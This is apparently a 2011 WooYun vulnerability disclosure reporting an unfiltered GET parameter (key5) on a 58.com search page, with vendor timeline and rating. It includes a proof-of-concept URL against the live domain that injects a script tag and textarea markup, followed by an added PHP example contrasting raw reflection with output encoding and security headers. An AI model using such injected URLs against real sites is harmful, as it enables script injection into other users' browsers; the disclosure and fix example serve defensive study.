
Vulnerability summary (24 followers)

Defect ID: wooyun-2011-02171

Title: Characters submitted via GET are not filtered

Vendor: 58同城

Author: perhaps

Submitted: 2011-05-24 16:34

Fix deadline: 2011-05-29 18:00

Disclosed: 2011-05-29 18:00

Type: XSS (cross-site scripting)

Severity: High

Self-assessed rank: 10

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2011-05-24: Details sent to the vendor, awaiting the vendor's handling
2011-05-29: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

http://sou114.58.com.cn/58show.php?key5= The vulnerability is serious: almost no characters coming from the browser are filtered... and the range of script the server side allows to execute is also very broad. Business is booming, safety first, heh.

Detailed description:

http://sou114.58.com.cn/58show.php?key5=%E4%BA%A4%E5%8F%8B%22%3E%3Cscript%20window.open(%22www.baidu.com%22)%3C/script%3E%3Ctextarea%20cols=100%20rows=111%3E%E8%BF%99%E6%A0%B7%E5%8F%8D%E5%A4%8D%E4%BA%86%E8%AE%B8%E5%A4%9A%E5%90%8E%E6%AC%A1%E5%90%8E%EF%BC%8C%E9%82%A3%E7%94%B7%E4%BA%BA%E5%BE%84%E8%87%AA%E8%B5%B7%E8%BA%AB%E8%B5%B0%E5%87%BA%E9%97%A8%E5%A4%96%E5%8E%BB%EF%BC%8C%E5%A5%B3%E4%BA%BA%E4%BC%B8%E5%A4%B4%E5%96%8A%E4%BA%86%E5%87%A0%E5%A3%B0%E4%BB%96%E4%B9%9F%E4%B8%8D%E7%90%86%E3%80%82%E7%AD%89%E6%88%91%E5%BF%AB%E5%90%83%E5%AE%8C%E6%97%B6%EF%BC%8C%E9%82%A3%E7%94%B7%E4%BA%BA%E5%9B%9E%E6%9D%A5%E4%BA%86%EF%BC%8C%E6%89%8B%E9%87%8C%E8%BF%98%E6%8A%93%E7%9D%80%E4%B8%80%E4%B8%AA%E6%96%B0%E8%80%83%E5%A5%BD%E7%9A%84%E7%BA%A2%E8%96%AF%EF%BC%8C%E8%BF%98%E5%86%92%E7%9D%80%E7%99%BD%E7%99%BD%E7%9A%84%E7%83%AD%E6%B0%94%E3%80%82%E4%BB%96%E7%A2%B0%E4%BA%86%E4%B8%80%E4%B8%8B%E5%A5%B3%E4%BA%BA%EF%BC%8C%E5%B0%B1%E5%B0%86%E7%83%AD%E4%B9%8E%E4%B9%8E%E7%9A%84%E7%BA%A2%E8%96%AF%E8%BF%9E%E7%9A%AE%E9%83%BD%E6%B2%A1%E5%89%A5%E5%BC%80%E5%B0%B1%E5%A1%9E%E5%88%B0%E5%A5%B3%E4%BA%BA%E6%89%8B%E9%87%8C%EF%BC%8C%E4%BD%8E%E5%A3%B0%E5%9C%B0%E8%AF%B4%EF%BC%9A%E2%80%9C%E5%90%83%E5%90%A7%EF%BC%81%E2%80%9D%E5%B8%A6%E7%9D%80%E6%B5%93%E5%8E%9A%E7%9A%84%E5%9C%B0%E6%96%B9%E5%8F%A3%E9%9F%B3%E3%80%82%E6%88%91%E7%9C%8B%E5%88%B0%E5%A5%B3%E4%BA%BA%E5%8F%91%E6%84%A3%E5%9C%B0%E7%9C%8B%E4%BA%86%E7%9C%8B%E8%87%AA%E5%B7%B1%E7%9A%84%E4%B8%88%E5%A4%AB%E4%B8%80%E4%B8%8B%EF%BC%8C%E8%84%B8%E4%B8%8A%E6%B5%AE%E7%8E%B0%E5%87%BA%E4%BA%86%E5%B9%B8%E7%A6%8F%E7%9A%84%E5%BE%AE%E7%AC%91%E3%80%82%E6%88%91%E7%8C%9C%E6%83%B3%EF%BC%8C%E5%A5%B9%E5%A4%A7%E6%A6%82%E6%98%AF%E6%83%8A%E8%AE%B6%E8%87%AA%E5%B7%B1%E7%9A%84%E4%B8%88%E5%A4%AB%E5%B9%B3%E6%97%B6%E4%B8%8D%E8%88%8D%E5%BE%97%E8%8A%B1%E9%92%B1%EF%BC%8C%E4%BD%86%E4%BB%8A%E5%A4%A9%E5%8D%B4%E8%8A%B1%E9%92%B1%E4%B8%BA%E8%87%AA%E5%B7%B1%E4%B9%B0%E5%90%83%E7%9A%84%E3%80%82%E7%84%B6%E5%90%8E%EF%BC%8C%E5%A5%B3%E4%BA%BA%E5%B0%B1%E5%BC%80%E5%A7%8B%E7%BB%86%E7%BB%86%E5%9C%B0%E3%80%81%E5%B0%8F%E5%BF%83%E5%9C%B0%E5%90%83%E5%90%83%E7%9D%80%E3%80%82%E5%BD%93%E5%8F%AA%E5%89%A9%E4%B8%8B%E4%B8%80%E5%8D%8A%E5%90%8E%EF%BC%8C%E5%A5%B9%E5%BF%BD%E7%84%B6%E5%81%9C%E4%B8%8B%E6%9D%A5%EF%BC%8C%E6%8A%8A%E6%89%8B%E9%87%8C%E7%9A%84%E5%8D%8A%E5%9D%97%E7%BA%A2%E8%96%AF%E9%80%92%E5%88%B0%E4%B8%88%E5%A4%AB%E7%9A%84%E5%98%B4%E8%BE%B9%EF%BC%8C%E8%AF%B4%EF%BC%9A%E2%80%9C%E6%88%91%E5%90%83%E9%A5%B1%E4%BA%86%EF%BC%8C%E4%BD%A0%E5%90%83%E5%90%A7%EF%BC%81%E2%80%9D%E5%90%8C%E6%A0%B7%E5%B8%A6%E7%9D%80%E6%B5%93%E9%87%8D%E7%9A%84%E5%9C%B0%E6%96%B9%E5%8F%A3%E9%9F%B3%E3%80%82%E5%A5%B9%E4%B8%88%E5%A4%AB%E6%8E%A8%E5%BC%80%E8%AF%B4%EF%BC%9A%E2%80%9C%E6%88%91%E4%B8%8D%E5%90%83%E3%80%82%E2%80%9D%E8%99%BD%E7%84%B6%E9%82%A3%E7%94%B7%E4%BA%BA%E8%AF%B4%E4%B8%8D%E5%90%83%EF%BC%8C%E4%BD%86%E6%98%AF%E4%BB%96%E5%8D%B4%E6%82%84%E6%82%84%E5%9C%B0%E5%92%BD%E4%BA%86%E5%92%BD%E5%8F%A3%E6%B0%B4%EF%BC%8C%E5%9B%A0%E4%B8%BA%E6%88%91%E7%9C%8B%E5%88%B0%E4%BB%96%E7%9A%84%E5%96%89%E7%BB%93%E5%8A%A8%E4%BA%86%E5%8A%A8%E3%80%82%E4%B8%A4%E4%BA%BA%E6%8E%A8%E6%9D%A5%E6%8E%A8%E5%8E%BB%E5%A5%BD%E4%B8%80%E4%BC%9A%E5%84%BF%E5%90%8E%EF%BC%8C%E5%A5%B3%E4%BA%BA%E5%B0%B1%E5%BC%BA%E8%A1%8C%E5%B0%86%E7%BA%A2%E8%96%AF%E5%A1%9E%E5%88%B0%E7%94%B7%E4%BA%BA%E7%9A%84%E6%89%8B%E9%87%8C%EF%BC%8C%E5%A5%B3%E4%BA%BA%E7%9C%8B%E7%94%B7%E4%BA%BA%E5%90%83%E5%AE%8C%EF%BC%8C%E4%BE%BF%E7%9B%B8%E8%A7%86%E8%80%8C%E7%AC%91%EF%BC%8C%E7%84%B6%E5%90%8E%E5%8F%88%E9%9D%A0%E5%9C%A8%E4%B8%80%E8%B5%B7%E7%BC%A9%E7%9D%80%E5%9D%90%E7%9D%80%E3%80%82%E9%82%A3%E5%A5%B3%E4%BA%BA%E7%9C%8B%E5%88%B0%E6%88%91%E7%9C%8B%E4%BB%96%E4%BF%A9%EF%BC%8C%E5%8F%88%E5%BE%AE%E5%BE%AE%E7%9A%84%E7%AC%91%E4%BA%86%E7%AC%91&%3C/textarea%3E
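The report describes a search parameter (key5) that is reflected into the page without any encoding. The example below is added here as an illustration and is not 58.com's code: it places the reflection pattern the report describes beside the hardened form a PHP handler should use, namely context-aware output encoding with htmlspecialchars plus a Content-Security-Policy header as defence in depth. The parameter name key5 comes from the report URL; the function names, markup and sample input are constructed for the example.

```php
<?php
// Added example, not the vendor's code. Shows the unencoded reflection the
// report describes next to a hardened version of the same handler.
// Only the parameter name "key5" is taken from the report; everything else
// (function names, markup, sample input) is a constructed illustration.

declare(strict_types=1);

// Pattern the report describes: the GET value lands in HTML untouched, so
// any markup or script the browser sends is rendered as-is.
function render_unfiltered(string $key5): string
{
    return "<p>Results for: " . $key5 . "</p>";
}

// Hardened form: encode for the HTML text context. ENT_QUOTES covers both
// quote characters so the value cannot break out of an attribute either;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string;
// the explicit charset prevents encoding-based bypasses.
function render_encoded(string $key5): string
{
    $escaped = htmlspecialchars(
        $key5,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
    return "<p>Results for: " . $escaped . "</p>";
}

// Defence in depth: declare the charset explicitly and forbid inline script
// and script from other origins, so a missed encoding elsewhere on the page
// still cannot execute an injected script.
function send_security_headers(): void
{
    header('Content-Type: text/html; charset=UTF-8');
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
    header('X-Content-Type-Options: nosniff');
}

if (PHP_SAPI !== 'cli') {
    send_security_headers();
    $key5 = (string) ($_GET['key5'] ?? '');
    echo render_encoded($key5);
} else {
    // Constructed sample input for a command-line self-check: a search term
    // followed by a quote and a harmless tag. The encoded output keeps it
    // as text instead of markup.
    $sample = '交友"><b>x</b>';
    echo "unencoded: ", render_unfiltered($sample), PHP_EOL;
    echo "encoded:   ", render_encoded($sample), PHP_EOL;
}
```

Run with `php example.php` to see both renderings side by side; in the encoded output `<b>` appears as `&lt;b&gt;` and the quote as `&quot;`, so the browser treats the whole value as text. Encoding at output time, per context, is the fix; blocklisting individual characters on input is what the report shows failing.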

Proof of vulnerability:

Proposed fix:

Copyright notice: credit the source when reposting: perhaps@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2011-05-29 18:00

Vendor reply:

Vulnerability rank: 3 (WooYun rating)

Latest status:

None yet